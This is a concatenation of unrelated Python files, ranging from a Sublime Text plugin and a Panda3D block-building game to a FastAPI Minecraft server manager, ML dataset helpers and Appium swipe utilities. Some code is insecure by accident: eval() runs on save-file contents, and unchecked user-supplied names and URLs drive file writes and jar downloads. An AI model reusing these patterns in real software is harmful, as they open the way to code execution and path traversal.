self.sublime = sublime.active_window().active_view().settings()
self.project = self.sublime.get('php-cs-fixer')
else:
self.sublime = {}
self.project = {}
self.plugin = sublime.load_settings('PHPCSFixer.sublime-settings')
def get(self, key, default=None):
if self.project is not None and self.project.get(key) is not None:
return self.project.get(key)
if self.plugin.get(key) is not None:
return self.plugin.get(key)
return default
def isPHPFile(self):
syntax = self.sublime.get('syntax')
if syntax is None:
return False
if syntax.endswith('PHP.tmLanguage') or syntax.endswith('PHP.sublime-syntax'):
return True
return False
def isAllowedExtension(self, filename):
ignored = self.get('ignored_extensions', [])
for ext in ignored:
if filename.endswith(ext):
return False
return True
class PhpCsFixerOpenFileCommand(sublime_plugin.ApplicationCommand):
@staticmethod
def run(file):
platform_name = {
'osx': 'OSX',
'windows': 'Windows',
'linux': 'Linux',
}[sublime.platform()]
file = file.replace('${platform}', platform_name)
sublime.run_command('open_file', {'file': file})
@staticmethod
def is_visible():
return STVER < 3124
class PhpCsFixerEditSettingsCommand(sublime_plugin.ApplicationCommand):
@staticmethod
def run(**kwargs):
sublime.run_command('edit_settings', kwargs)
@staticmethod
def is_visible():
return STVER >= 3124
| 4,144 | 1,267 |
class Deleter:
####################################################################################################################
# Constructor.
####################################################################################################################
def __init__(self, db_context):
"""
Initializes attributes.
Parameters
----------
db_context : DbContext
The database context to work with.
"""
### Validate parameters.
if db_context is None:
raise Exception('db_context cannot be None.')
### Attributes from outside.
self._db_context = db_context
| 686 | 138 |
from panda3d.core import *
from direct.gui.DirectGui import *
from direct.showbase.ShowBase import ShowBase
from noise import snoise2
import os
import random
from Block import *
loadPrcFile('config/general.prc')
if __debug__:
loadPrcFile('config/dev.prc')
base = ShowBase()
octavesElev = 5
octavesRough = 2
octavesDetail = 1
freq = 16.0 * octavesElev
world = {}
verboseLogging = False
fancyRendering = False
wantNewGeneration = False
fillWorld = False
base.setFrameRateMeter(True)
paused = False
inventory = [DIRT, COBBLESTONE, GLASS, GRASS, BRICKS, WOOD, LEAVES, PLANKS, STONE]
currentBlock = inventory[0]
currentSelectedText = DirectLabel(text = "Current block:", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = aspect2d, scale = 0.05, pos = (0,0,-0.9))
currentBlockText = DirectLabel(text = blockNames[currentBlock], text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = aspect2d, scale = 0.05, pos = (0,0,-0.95))
def pause():
global paused
paused = not paused
if paused:
base.disableMouse()
pauseScreen.showPause()
else:
base.enableMouse()
pauseScreen.hide()
class PauseScreen:
def __init__(self):
self.pauseScr = aspect2d.attachNewNode("pause") # This is used so that everything can be stashed at once... except for dim, which is on render2d
self.loadScr = aspect2d.attachNewNode("load") # It also helps for flipping between screens
self.saveScr = aspect2d.attachNewNode("save")
cm = CardMaker('card')
self.dim = render2d.attachNewNode(cm.generate())
self.dim.setPos(-1, 0, -1)
self.dim.setScale(2)
self.dim.setTransparency(1)
self.dim.setColor(0, 0, 0, 0.5)
self.buttonModel = loader.loadModel('gfx/button')
inputTexture = loader.loadTexture('gfx/tex/button_press.png')
# Pause Screen
self.unpauseButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, 0.3), text = "Resume Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = pause)
self.saveButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, 0.15), text = "Save Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showSave)
self.loadButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, -0.15), text = "Load Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showLoad)
self.exitButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, -0.3), text = "Quit Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = exit)
# Save Screen
self.saveText = DirectLabel(text = "Type in a name for your world", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.saveScr, scale = 0.075, pos = (0,0,0.35))
self.saveText2 = DirectLabel(text = "", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.saveScr, scale = 0.06, pos = (0,0,-0.45))
self.saveName = DirectEntry(text = "", scale= .15, command=self.save, initialText="My World", numLines = 1, focus=1, frameTexture = inputTexture, parent = self.saveScr, text_fg = (1,1,1,1),
pos = (-0.6, 0, 0.1), text_scale = 0.75)
self.saveGameBtn = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
relief = None, parent = self.saveScr, scale = 0.5, pos = (0, 0, -0.1), text = "Save", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.save)
self.backButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
relief = None, parent = self.saveScr, scale = 0.5, pos = (0, 0, -0.25), text = "Back", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showPause)
# Load Screen
numItemsVisible = 3
itemHeight = 0.15
self.loadList = DirectScrolledList(
decButton_pos= (0.35, 0, 0.5),
decButton_text = "^",
decButton_text_scale = 0.04,
decButton_text_pos = (0, -0.025),
decButton_text_fg = (1, 1, 1, 1),
decButton_borderWidth = (0.005, 0.005),
decButton_scale = (1.5, 1, 2),
decButton_geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
decButton_geom_scale = 0.1,
decButton_relief = None,
incButton_pos= (0.35, 0, 0),
incButton_text = "^",
incButton_text_scale = 0.04,
incButton_text_pos = (0, -0.025),
incButton_text_fg = (1, 1, 1, 1),
incButton_borderWidth = (0.005, 0.005),
incButton_hpr = (0,180,0),
incButton_scale = (1.5, 1, 2),
incButton_geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
incButton_geom_scale = 0.1,
incButton_relief = None,
frameSize = (-0.4, 1.1, -0.1, 0.59),
frameTexture = inputTexture,
frameColor = (1, 1, 1, 0.75),
pos = (-0.45, 0, -0.25),
scale = 1.25,
numItemsVisible = numItemsVisible,
forceHeight = itemHeight,
itemFrame_frameSize = (-0.2, 0.2, -0.37, 0.11),
itemFrame_pos = (0.35, 0, 0.4),
itemFrame_frameColor = (0,0,0,0),
parent = self.loadScr
)
self.backButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
relief = None, parent = self.loadScr, scale = 0.5, pos = (0, 0, -0.5), text = "Back", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showPause)
self.loadText = DirectLabel(text = "Select World", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.loadScr, scale = 0.075, pos = (0,0,0.55))
self.loadText2 = DirectLabel(text = "", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.loadScr, scale = 0.075, pos = (0,0,-0.7))
self.hide()
def showPause(self):
self.saveScr.stash()
self.loadScr.stash()
self.pauseScr.unstash()
self.dim.unstash()
def showSave(self):
self.pauseScr.stash()
self.saveScr.unstash()
self.saveText2['text'] = ""
def showLoad(self):
self.pauseScr.stash()
self.loadScr.unstash()
self.loadText2['text'] = ""
self.loadList.removeAndDestroyAllItems()
f = []
if not os.path.exists('saves/'):
os.makedirs('saves/')
for (dirpath, dirnames, filenames) in os.walk('saves/'):
f.extend(filenames)
break
for file in f:
l = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
relief = None, scale = 0.5, pos = (0, 0, -0.75), text = file.strip('.sav'), text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.load, extraArgs = [file])
self.loadList.addItem(l)
def save(self, worldName = None):
self.saveText2['text'] = "Saving..."
if worldName == None:
worldName = self.saveName.get(True)
print "Saving %s..." % worldName
dest = 'saves/%s.sav' % worldName
dir = os.path.dirname(dest)
if not os.path.exists(dir):
os.makedirs(dir)
try:
f = open(dest, 'wt')
except IOError:
self.saveText2['text'] = "Could not save. Make sure the world name does not contain the following characters: \\ / : * ? \" < > |"
print "Failed!"
return
for key in world:
if world[key].type == AIR:
continue
f.write(str(key) + ':')
f.write(str(world[key].type) + '\n')
f.close()
self.saveText2['text'] = "Saved!"
print "Saved!"
def load(self, worldName):
self.loadText2['text'] = "Loading..."
print "Loading..."
f = open('saves/%s' % worldName, 'r')
toLoad = f.read().split('\n')
toLoad.pop() # get rid of newline
for key in world:
addBlock(AIR, key[0], key[1], key[2])
world.clear()
for key in toLoad:
key = key.split(':')
posTup = eval(key[0])
addBlock(int(key[1]), posTup[0], posTup[1], posTup[2])
f.close()
self.loadText2['text'] = "Loaded!"
print "Loaded!"
def hide(self):
self.pauseScr.stash()
self.loadScr.stash()
self.saveScr.stash()
self.dim.stash()
pauseScreen = PauseScreen()
def addBlock(blockType,x,y,z):
try:
world[(x,y,z)].cleanup()
except:
pass
block = Block(blockType, x, y, z)
world[(x,y,z)] = block
return
for x in xrange(0, 16):
for y in xrange(0, 16):
amplitude = random.randrange(0.0,5.0)
blockType = DIRT
if wantNewGeneration:
z = max(min(int(snoise2(x / freq, y / freq, octavesElev)+(snoise2(x / freq, y / freq, octavesRough)*snoise2(x / freq, y / freq, octavesDetail))*64+64), 128), 0)
addBlock(blockType,x,y,z)
else:
z = max((int(snoise2(x / freq, y / freq, 5) * amplitude)+8), 0)
addBlock(blockType,x,y,z)
if fillWorld:
for height in xrange(0, z+1):
addBlock(blockType,x,y,height)
if verboseLogging:
print "Generated %s at (%d, %d, %d)" % (blockNames[blockType], x, y, z)
alight = AmbientLight('alight')
alight.setColor(VBase4(0.6, 0.6, 0.6, 1))
alnp = render.attachNewNode(alight)
render.setLight(alnp)
slight = Spotlight('slight')
slight.setColor(VBase4(1, 1, 1, 1))
lens = PerspectiveLens()
slight.setLens(lens)
slnp = render.attachNewNode(slight)
slnp.setPos(8, -9, 128)
slnp.setHpr(0,270,0)
render.setLight(slnp)
if fancyRendering:
# Use a 512x512 resolution shadow map
slight.setShadowCaster(True, 512, 512)
# Enable the shader generator for the receiving nodes
render.setShaderAuto()
traverser = CollisionTraverser()
handler = CollisionHandlerQueue()
pickerNode = CollisionNode('mouseRay')
pickerNP = camera.attachNewNode(pickerNode)
pickerNode.setFromCollideMask(GeomNode.getDefaultCollideMask())
pickerRay = CollisionRay()
pickerNode.addSolid(pickerRay)
traverser.addCollider(pickerNP, handler)
def handlePick(right=False):
if paused:
return # no
if base.mouseWatcherNode.hasMouse():
mpos = base.mouseWatcherNode.getMouse()
pickerRay.setFromLens(base.camNode, mpos.getX(), mpos.getY())
traverser.traverse(render)
if handler.getNumEntries() > 0:
handler.sortEntries()
pickedObj = handler.getEntry(0).getIntoNodePath()
pickedObj = pickedObj.findNetTag('blockTag')
if not pickedObj.isEmpty():
if right:
handleRightPickedObject(pickedObj, handler.getEntry(0).getIntoNodePath().findNetTag('westTag').isEmpty(),
handler.getEntry(0).getIntoNodePath().findNetTag('northTag').isEmpty(), handler.getEntry(0).getIntoNodePath().findNetTag('eastTag').isEmpty(),
handler.getEntry(0).getIntoNodePath().findNetTag('southTag').isEmpty(), handler.getEntry(0).getIntoNodePath().findNetTag('topTag').isEmpty(),
handler.getEntry(0).getIntoNodePath().findNetTag('botTag').isEmpty())
else:
handlePickedObject(pickedObj)
def hotbarSelect(slot):
global currentBlock
currentBlock = inventory[slot-1]
currentBlockText["text"] = blockNames[currentBlock]
if verboseLogging:
print "Selected hotbar slot %d" % slot
print "Current block: %s" % blockNames[currentBlock]
base.accept('mouse1', handlePick)
base.accept('mouse3', handlePick, extraArgs=[True])
base.accept('escape', pause)
base.accept('1', hotbarSelect, extraArgs=[1])
base.accept('2', hotbarSelect, extraArgs=[2])
base.accept('3', hotbarSelect, extraArgs=[3])
base.accept('4', hotbarSelect, extraArgs=[4])
base.accept('5', hotbarSelect, extraArgs=[5])
base.accept('6', hotbarSelect, extraArgs=[6])
base.accept('7', hotbarSelect, extraArgs=[7])
base.accept('8', hotbarSelect, extraArgs=[8])
base.accept('9', hotbarSelect, extraArgs=[9])
def handlePickedObject(obj):
if verboseLogging:
print "Left clicked a block at %d, %d, %d" % (obj.getX(), obj.getY(), obj.getZ())
addBlock(AIR, obj.getX(), obj.getY(), obj.getZ())
def handleRightPickedObject(obj, west, north, east, south, top, bot):
if verboseLogging:
print "Right clicked a block at %d, %d, %d, attempting to place %s" % (obj.getX(), obj.getY(), obj.getZ(), blockNames[currentBlock])
try:
# not [block face] checks to see if the user clicked on [block face]. this is not confusing at all.
if world[(obj.getX()-1, obj.getY(), obj.getZ())].type == AIR and not west:
addBlock(currentBlock, obj.getX()-1, obj.getY(), obj.getZ())
elif world[(obj.getX()+1, obj.getY(), obj.getZ())].type == AIR and not east:
addBlock(currentBlock, obj.getX()+1, obj.getY(), obj.getZ())
elif world[(obj.getX(), obj.getY()-1, obj.getZ())].type == AIR and not south:
addBlock(currentBlock, obj.getX(), obj.getY()-1, obj.getZ())
elif world[(obj.getX(), obj.getY()+1, obj.getZ())].type == AIR and not north:
addBlock(currentBlock, obj.getX(), obj.getY()+1, obj.getZ())
elif world[(obj.getX(), obj.getY(), obj.getZ()+1)].type == AIR and not top:
addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()+1)
elif world[(obj.getX(), obj.getY(), obj.getZ()-1)].type == AIR and not bot:
addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()-1)
except KeyError:
if not west:
addBlock(currentBlock, obj.getX()-1, obj.getY(), obj.getZ())
elif not east:
addBlock(currentBlock, obj.getX()+1, obj.getY(), obj.getZ())
elif not south:
addBlock(currentBlock, obj.getX(), obj.getY()-1, obj.getZ())
elif not north:
addBlock(currentBlock, obj.getX(), obj.getY()+1, obj.getZ())
elif not top:
addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()+1)
elif not bot:
addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()-1)
fog = Fog("fog")
fog.setColor(0.5294, 0.8078, 0.9215)
fog.setExpDensity(0.015)
render.setFog(fog)
base.camLens.setFar(256)
base.run()
| 16,027 | 5,768 |
from json.decoder import JSONDecodeError
from fastapi import FastAPI, Response, Request
from fastapi.staticfiles import StaticFiles
from argparse import ArgumentParser
from starlette.status import *
from starlette.responses import FileResponse, JSONResponse
import uvicorn
import os
from pymongo import MongoClient
from pymongo.database import Database
import json
from util import fetch_jarinfo, defaults
import logging
from logging import debug, info, warning, error, critical, exception
import threading
import time
from models import *
import hashlib
import random
import server_manager
import requests
import base64
AUTHENTICATED_CONNECTIONS = {}
def fetch_loop(db: Database):
WAIT = 12 # Delay between fetches (hours)
while True:
info('Fetching minecraft version info.')
jar_info = fetch_jarinfo()
jar_info['record'] = 'versions'
info('Found {mc} vanilla versions and {paper} papermc versions. Latest version is {latest}. Latest snapshot is {latest_snap}.'.format(
mc=str(len(jar_info['vanilla'])),
paper=str(len(jar_info['paper'])),
latest=jar_info['latest']['release'],
latest_snap=jar_info['latest']['snapshot']
))
db.versions.replace_one({'record': 'versions'}, jar_info, upsert=True)
time.sleep(WAIT * 3600)
if __name__ == '__main__':
parser = ArgumentParser(description='Run minecraft-socket server.')
parser.add_argument('--config', default='config.json', help='Path to config file (JSON)')
args = parser.parse_args()
try:
with open(args.config, 'r') as c:
os.environ['MC-CONFIG'] = json.dumps(json.load(c))
except JSONDecodeError:
print('FATAL: Bad JSON structure.')
exit(0)
except FileNotFoundError:
print(f'FATAL: {args.config} not found.')
exit(0)
CONF = json.loads(os.environ['MC-CONFIG'])
uvicorn.run('main:app', host=CONF['runtime']['host'], port=CONF['runtime']['port'], access_log=False)
else:
try:
CONFIG = json.loads(os.environ['MC-CONFIG'])
except:
print(f'FATAL: config not loaded.')
exit(0)
logging.basicConfig(
format=CONFIG["logging"]["format"],
level=logging.getLevelName(CONFIG["logging"]["level"].upper()),
)
info('Loading connection to DB')
db = CONFIG['database']
mongodb = MongoClient(
host=db['ip'],
port=db['port'],
username=db['username'],
password=db['password'],
tls=db['secure']
)
database = mongodb.minecraft_socket
info('Starting fetch thread.')
fetch_thread = threading.Thread(target=fetch_loop, name='mcjar_fetch_thread', daemon=True, args=[database])
fetch_thread.start()
info('Checking env setup.')
if not os.path.exists(CONFIG['server_folder']):
os.makedirs(CONFIG['server_folder'])
info('Starting server manager.')
manager = server_manager.ServerManager(CONFIG['server_folder'], database)
app = FastAPI()
app.mount('/web', StaticFiles(directory='web'), 'staticfiles')
@app.get('/')
async def get_index():
return FileResponse(os.path.join('web', 'index.html'))
@app.middleware('http')
async def auth(request: Request, call_next):
for k in list(AUTHENTICATED_CONNECTIONS.keys()):
if AUTHENTICATED_CONNECTIONS[k]+CONFIG['connection_timeout'] < time.time():
del AUTHENTICATED_CONNECTIONS[k]
if request.url.path == '/' or request.url.path.startswith('/web') or request.url.path == '/auth':
return await call_next(request)
else:
if 'x-authkey' in request.headers.keys():
if request.headers['x-authkey'] in AUTHENTICATED_CONNECTIONS.keys():
return await call_next(request)
else:
return JSONResponse({'result': 'failure', 'reason': 'Auth key not recognized.'}, HTTP_403_FORBIDDEN)
else:
return JSONResponse({'result': 'failure', 'reason': 'Auth key not passed in headers.'}, HTTP_403_FORBIDDEN)
@app.post('/auth')
async def post_auth(request: Request, response: Response):
model = await request.json()
hashed_pass = hashlib.sha256(CONFIG['password'].encode('utf-8')).hexdigest()
if hashed_pass == model['passhash']:
cid = hashlib.sha256(str(time.time()+random.random()).encode('utf-8')).hexdigest()
AUTHENTICATED_CONNECTIONS[cid] = time.time()
return {'result': 'success', 'connection_id': cid}
else:
response.status_code = HTTP_403_FORBIDDEN
return {'result': 'failure', 'reason': 'Incorrect passcode.'}
@app.get('/versions')
async def get_versions(response: Response, request: Request):
try:
res = database.versions.find_one({'record': 'versions'})
del res['_id']
del res['record']
return res
except:
return {
'latest': {'release': None, 'snapshot': None},
'paper': {},
'vanilla': {}
}
@app.post('/servers/new')
async def new_server(req: Request, res: Response):
fields = defaults(await req.json(), defs={
'max_memory': 2, # GB
'name': f'server_{int(time.time())}',
'server_port': 25565,
'server_ip': '',
'world_seed': '',
'whitelist': True,
'max_players': 20,
'difficulty': 'hard',
'gamemode': 'survival',
'motd': 'Minecraft Server Running on Minecraft-Socket [iTecAI]',
'command_blocks': True,
'other_args': ''
}) # also requires {jar: url or base-64 encoded jar}
if os.path.exists(os.path.join(CONFIG['server_folder'], fields['name'])):
res.status_code = HTTP_405_METHOD_NOT_ALLOWED
return {'result': 'failure', 'reason': f'Server {fields["name"]} already exists.'}
if not 'jar' in fields.keys():
res.status_code = HTTP_400_BAD_REQUEST
return {'result': 'failure', 'reason': 'Server jar not specified'}
info(f'Creating new server {fields["name"]} running at {fields["server_ip"]}:{fields["server_port"]}.')
os.mkdir(os.path.join(CONFIG['server_folder'], fields['name']))
with open(os.path.join(CONFIG['server_folder'], fields['name'], 'eula.txt'), 'w') as f:
f.write('eula=true')
with open('server.properties.template', 'r') as f:
properties = f.read().format(
gamemode=fields['gamemode'],
cmdblocks='true' if fields['command_blocks'] else 'false',
motd=fields['motd'],
seed=fields['world_seed'],
difficulty=fields['difficulty'],
max_players=str(fields['max_players']),
server_ip=fields['server_ip'],
server_port=str(fields['server_port']),
whitelist='true' if fields['whitelist'] else 'false'
)
with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.properties'), 'w') as f:
f.write(properties)
database.servers.insert_one({
'max_memory': fields['max_memory'],
'name': fields['name'],
'java_args': fields['other_args'],
'address': fields['server_ip']+':'+str(fields['server_port']),
'enabled': True
})
if 'https://' in fields['jar'] or 'http://' in fields['jar']:
response = requests.get(fields['jar'], stream=True)
with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.jar'), 'wb') as fd:
for chunk in response.iter_content(chunk_size=128):
fd.write(chunk)
else:
with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.jar'), 'wb') as fd:
fd.write(base64.b64decode(fields['jar'].split('base64,')[1].encode('utf-8')))
manager.start_server(fields['name'])
return {'result': 'success'}
@app.post('/servers/{name}/stop')
async def stop_server(name: str, res: Response):
try:
manager.stop_server(name)
return {'result': 'success'}
except KeyError:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} not online.'}
@app.post('/servers/{name}/delete')
async def delete_server(name: str, res: Response):
try:
manager.stop_server(name)
except KeyError:
pass
database.servers.delete_one({'name': name})
return {'result': 'success'}
@app.get('/servers/{name}/logs')
async def get_logs(name: str, res: Response):
try:
manager.get_logs(name)
return {'result': 'success', 'logs': manager.get_logs(name)}
except KeyError:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} not online.'}
@app.post('/servers/{name}/command')
async def command_server(name: str, res: Response, req: Request):
fields = await req.json()
if not 'command' in fields.keys():
res.status_code = HTTP_400_BAD_REQUEST
return {'result': 'failure', 'reason': 'Command not passed'}
try:
manager.command_server(name, fields['command'])
except KeyError:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} not online.'}
return {'result': 'success'}
@app.post('/servers/{name}/start')
async def start_server(name: str, res: Response):
try:
manager.start_server(name)
except KeyError:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} not online.'}
return {'result': 'success'}
@app.post('/servers/{name}/modify_prop')
async def start_server(name: str, res: Response, req: Request):
fields = await req.json()
if not 'content' in fields.keys():
res.status_code = HTTP_400_BAD_REQUEST
return {'result': 'failure', 'reason': 'Content not passed.'}
if database.servers.find_one({'name': name}):
with open(os.path.join(CONFIG['server_folder'], name, 'server.properties'), 'w') as f:
f.write(fields['content'])
else:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} does not exist.'}
@app.post('/servers/{name}/modify_spec')
async def start_server(name: str, res: Response, req: Request):
fields = await req.json()
if not 'content' in fields.keys():
res.status_code = HTTP_400_BAD_REQUEST
return {'result': 'failure', 'reason': 'Content not passed.'}
if database.servers.find_one({'name': name}):
try:
database.servers.replace_one({'name': name}, json.loads(fields['content']))
return {'result': 'success'}
except:
res.status_code = HTTP_400_BAD_REQUEST
return {'result': 'failure', 'reason': 'Bad content format.'}
else:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} does not exist.'}
@app.get('/servers/{name}/')
async def get_server_info(name: str, res: Response):
spec = database.servers.find_one({'name': name})
if spec:
del spec['_id']
with open(os.path.join(CONFIG['server_folder'], name, 'server.properties'), 'r') as f:
props = f.read()
return {
'result': 'success',
'spec': spec,
'prop': props,
'running': name in manager.servers.keys()
}
else:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} does not exist.'}
@app.get('/servers')
async def list_servers():
server_dict = {}
for s in database.servers.find():
if os.path.exists(os.path.join(CONFIG['server_folder'], s['name'])):
server_dict[s['name']] = {
'autostart': s['enabled'],
'running': s['name'] in manager.servers.keys(),
'address': s['address'],
'mem': s['max_memory']
}
return server_dict | 11,961 | 3,741 |
#my open weather api key to access the resourses
api_key = "enter your key here"
| 82 | 26 |
"""Adapted from t_SP in tests/t_geometric_program.py"""
import gpkit
# Decision variables
x = gpkit.Variable('x')
y = gpkit.Variable('y')
# must enable signomials for subtraction
with gpkit.SignomialsEnabled():
constraints = [x >= 1-y, y <= 0.1]
# create and solve the SP
m = gpkit.Model(x, constraints)
print(m.localsolve(verbosity=0).summary())
assert abs(m.solution(x) - 0.9) < 1e-6
# full interim solutions are available
print("x values of each GP solve (note convergence)")
print(", ".join("%.5f" % sol["freevariables"][x] for sol in m.program.results))
| 567 | 210 |
from django.urls import path
from cride.circles.views import ListCreateAPIView
urlpatterns = [
path('', ListCreateAPIView.as_view())
] | 140 | 45 |
# Aula 75 - SpinBox
from tkinter import *
app = Tk()
app.title('Pedroso')
app.geometry('500x300')
def exibirValor():
vvalor = sb_valores.get()
l_valor.config(text=vvalor)
# sb_valores = Spinbox(app, from_=0, to=10)
# Os valores podem ser informados por uma faixa, como acima,
# ou como abaixo, em uma tupla
sb_valores = Spinbox(app, values=(2, 4, 6, 8, 10))
sb_valores.pack()
l_valor = Label(app, text='Valor')
l_valor.pack()
btn_exibeValor = Button(app, text='Exibe Valor', command=exibirValor)
btn_exibeValor.pack()
app.mainloop()
| 550 | 251 |
"""This file contains all functions related to the dataset."""
# pylint: disable=import-error
import os
import tqdm
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from torch.utils.data import Dataset
class RegressionDataset(Dataset):
"""Create a Torch Dataset for our regression problem."""
def __init__(self, x_data, y_data):
self.x_data = x_data
self.y_data = y_data
def __getitem__(self, index):
return self.x_data[index], self.y_data[index]
def __len__(self):
return len(self.y_data)
def basic_random_split(path_to_train, valid_ratio=0.2):
"""This function split file according to a ratio to create
training and validation.
Args:
path_to_train (str): path of the data root directory.
valid_ratio (float): ratio of data for validation dataset.
Returns:
dict: Dictionary containing every data to create a Dataset.
"""
# Load the different files
training_data = load_files(path_to_data=path_to_train)
# Prepare features and targets
features_and_targets = remove_useless_features(training_data=training_data)
features_and_targets = create_x_and_y(
input_data=features_and_targets, valid_ratio=valid_ratio
)
return features_and_targets
def load_test_data(path_to_test):
"""This function load test data
Args:
path_to_test (str): path of the data root directory.
Returns:
dict: Dictionary containing every data to create a Dataset.
"""
# Load the different files
test_data = load_files(path_to_data=path_to_test)
# Drop useless
test_data["input"] = test_data["input"].drop(columns=["_ID"])
# Create a target
test_data["target"] = np.ones((len(test_data["input"])))
feature_and_target = {
"x_test": test_data["input"].to_numpy(),
"y_test": np.ones((len(test_data["input"]))).ravel(),
}
return feature_and_target
def load_files(path_to_data):
"""Load data input files.
Args:
path_to_data (str): path of the data root directory.
Returns:
list(pandas.core.frame.DataFrame): List of Dataframe containing data from each file.
"""
data = {}
data_files = os.listdir(path_to_data)
for datafile in tqdm.tqdm(data_files):
if "input" in datafile:
data["input"] = pd.read_csv(
os.path.join(path_to_data, datafile), delimiter=",", decimal="."
)
else:
data["target"] = pd.read_csv(
os.path.join(path_to_data, datafile), delimiter=",", decimal="."
)
return data
def remove_useless_features(training_data):
"""Create features and targets
Args:
training_data (list): List of Dataframe containing data from each file.
Returns:
dict : Dictionary containing features and target for each file.
"""
data_dict = {}
for key, data in training_data.items():
features = data.drop(columns=["_ID"])
data_dict[key] = features
return data_dict
def create_x_and_y(input_data, valid_ratio): # pylint: disable=too-many-locals
"""Generate train, valid and test for each file and for each target.
Args:
input_data (dict): Features and targets for one file.
valid_ratio (float): Test and validation ratio.
Returns:
dict: train, valid and test inputs and targets.
"""
feature_and_target = {}
x_train, x_valid, y_train, y_valid = train_test_split(
input_data["input"], input_data["target"], test_size=valid_ratio, random_state=0
)
y_train = y_train.values.ravel()
y_valid = y_valid.values.ravel()
feature_and_target = {
"x_train": x_train.to_numpy(),
"y_train": y_train,
"x_valid": x_valid.to_numpy(),
"y_valid": y_valid,
}
return feature_and_target
| 3,922 | 1,241 |
from .content import SinglePost
from .page import Page, MainPage
| 65 | 17 |
# coding=utf-8
"""
@author:songmengyun
@file: base_page.py
@time: 2020/01/03
"""
import time
import logging
from selenium.webdriver.common.by import By
from appium.webdriver.common.touch_action import TouchAction
from selenium.webdriver.support.wait import WebDriverWait
from appium.webdriver.mobilecommand import MobileCommand
from appium.webdriver.connectiontype import ConnectionType
from poseidon.ui.util.location import *
from poseidon.base import CommonBase as cb
from poseidon.ui.mobile.android.android_keycode import KEYCODE
class Swipe:
'''滚动屏幕相关'''
def __init__(self, driver):
self.driver = driver
def swipe_up(self, width, height, n=5):
'''定义向上滑动方法'''
logging.info("定义向上滑动方法")
x1 = width * 0.5
y1 = height * 0.9
y2 = height * 0.25
time.sleep(3)
logging.info("滑动前")
for i in range(n):
logging.info("第%d次滑屏" % i)
time.sleep(3)
self.driver.swipe(x1, y1, x1, y2)
def swipe_down(self, width, height, n=5):
'''定义向下滑动方法'''
logging.info("定义向下滑动方法")
x1 = width * 0.5
y1 = height * 0.25
y2 = height * 0.9
time.sleep(3)
logging.info("滑动前")
for i in range(n):
logging.info("第%d次滑屏" % i)
time.sleep(3)
self.driver.swipe(x1, y1, x1, y2)
def swipe_left(self, width, height, n=5):
'''定义向左滑动方法'''
logging.info("定义向左滑动方法")
x1 = width * 0.8
x2 = width * 0.2
y1 = height * 0.5
time.sleep(3)
logging.info("滑动前")
for i in range(n):
logging.info("第%d次滑屏" % i)
time.sleep(3)
self.driver.swipe(x1, y1, x2, y1)
def swipe_right(self, width, height, n=5):
'''定义向右滑动方法'''
logging.info("定义向右滑动方法")
x1 = width * 0.2
x2 = width * 0.8
y1 = height * 0.5
time.sleep(3)
logging.info("滑动前")
